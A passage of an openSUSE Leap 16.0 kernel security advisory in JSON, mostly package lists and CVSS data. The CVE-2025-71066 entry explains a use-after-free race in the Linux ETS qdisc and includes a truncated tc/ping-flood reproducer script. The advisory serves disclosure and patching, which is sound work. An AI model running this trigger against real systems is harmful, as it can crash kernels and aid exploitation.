"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71064"
},
{
"cve": "CVE-2025-71066",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71066"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: ets: Always remove class from active list before deleting in ets_qdisc_change\n\nzdi-disclosures@trendmicro.com says:\n\nThe vulnerability is a race condition between `ets_qdisc_dequeue` and\n`ets_qdisc_change`. It leads to UAF on `struct Qdisc` object.\nAttacker requires the capability to create new user and network namespace\nin order to trigger the bug.\nSee my additional commentary at the end of the analysis.\n\nAnalysis:\n\nstatic int ets_qdisc_change(struct Qdisc *sch, struct nlattr *opt,\n struct netlink_ext_ack *extack)\n{\n...\n\n // (1) this lock is preventing .change handler (`ets_qdisc_change`)\n //to race with .dequeue handler (`ets_qdisc_dequeue`)\n sch_tree_lock(sch);\n\n for (i = nbands; i \u003c oldbands; i++) {\n if (i \u003e= q-\u003enstrict \u0026\u0026 q-\u003eclasses[i].qdisc-\u003eq.qlen)\n list_del_init(\u0026q-\u003eclasses[i].alist);\n qdisc_purge_queue(q-\u003eclasses[i].qdisc);\n }\n\n WRITE_ONCE(q-\u003enbands, nbands);\n for (i = nstrict; i \u003c q-\u003enstrict; i++) {\n if (q-\u003eclasses[i].qdisc-\u003eq.qlen) {\n\t\t // (2) the class is added to the q-\u003eactive\n list_add_tail(\u0026q-\u003eclasses[i].alist, \u0026q-\u003eactive);\n q-\u003eclasses[i].deficit = quanta[i];\n }\n }\n WRITE_ONCE(q-\u003enstrict, nstrict);\n memcpy(q-\u003eprio2band, priomap, sizeof(priomap));\n\n for (i = 0; i \u003c q-\u003enbands; i++)\n WRITE_ONCE(q-\u003eclasses[i].quantum, quanta[i]);\n\n for (i = oldbands; i \u003c q-\u003enbands; i++) {\n q-\u003eclasses[i].qdisc = queues[i];\n if (q-\u003eclasses[i].qdisc != \u0026noop_qdisc)\n qdisc_hash_add(q-\u003eclasses[i].qdisc, true);\n }\n\n // (3) the qdisc is unlocked, now dequeue can be called in parallel\n // to the rest of .change handler\n sch_tree_unlock(sch);\n\n ets_offload_change(sch);\n for (i = q-\u003enbands; i \u003c oldbands; i++) {\n\t // (4) we\u0027re reducing the refcount for our class\u0027s qdisc and\n\t // freeing it\n qdisc_put(q-\u003eclasses[i].qdisc);\n\t // (5) If we call .dequeue between (4) and (5), we will have\n\t // a strong UAF and we can control RIP\n q-\u003eclasses[i].qdisc = NULL;\n WRITE_ONCE(q-\u003eclasses[i].quantum, 0);\n q-\u003eclasses[i].deficit = 0;\n gnet_stats_basic_sync_init(\u0026q-\u003eclasses[i].bstats);\n memset(\u0026q-\u003eclasses[i].qstats, 0, sizeof(q-\u003eclasses[i].qstats));\n }\n return 0;\n}\n\nComment:\nThis happens because some of the classes have their qdiscs assigned to\nNULL, but remain in the active list. This commit fixes this issue by always\nremoving the class from the active list before deleting and freeing its\nassociated qdisc\n\nReproducer Steps\n(trimmed version of what was sent by zdi-disclosures@trendmicro.com)\n\n```\nDEV=\"${DEV:-lo}\"\nROOT_HANDLE=\"${ROOT_HANDLE:-1:}\"\nBAND2_HANDLE=\"${BAND2_HANDLE:-20:}\" # child under 1:2\nPING_BYTES=\"${PING_BYTES:-48}\"\nPING_COUNT=\"${PING_COUNT:-200000}\"\nPING_DST=\"${PING_DST:-127.0.0.1}\"\n\nSLOW_TBF_RATE=\"${SLOW_TBF_RATE:-8bit}\"\nSLOW_TBF_BURST=\"${SLOW_TBF_BURST:-100b}\"\nSLOW_TBF_LAT=\"${SLOW_TBF_LAT:-1s}\"\n\ncleanup() {\n tc qdisc del dev \"$DEV\" root 2\u003e/dev/null\n}\ntrap cleanup EXIT\n\nip link set \"$DEV\" up\n\ntc qdisc del dev \"$DEV\" root 2\u003e/dev/null || true\n\ntc qdisc add dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\n\ntc qdisc add dev \"$DEV\" parent 1:2 handle \"$BAND2_HANDLE\" \\\n tbf rate \"$SLOW_TBF_RATE\" burst \"$SLOW_TBF_BURST\" latency \"$SLOW_TBF_LAT\"\n\ntc filter add dev \"$DEV\" parent 1: protocol all prio 1 u32 match u32 0 0 flowid 1:2\ntc -s qdisc ls dev $DEV\n\nping -I \"$DEV\" -f -c \"$PING_COUNT\" -s \"$PING_BYTES\" -W 0.001 \"$PING_DST\" \\\n \u003e/dev/null 2\u003e\u00261 \u0026\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 0\ntc qdisc change dev \"$DEV\" root handle \"$ROOT_HANDLE\" ets bands 2 strict 2\ntc -s qdisc ls dev $DEV\ntc qdisc del dev \"$DEV\" parent \n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
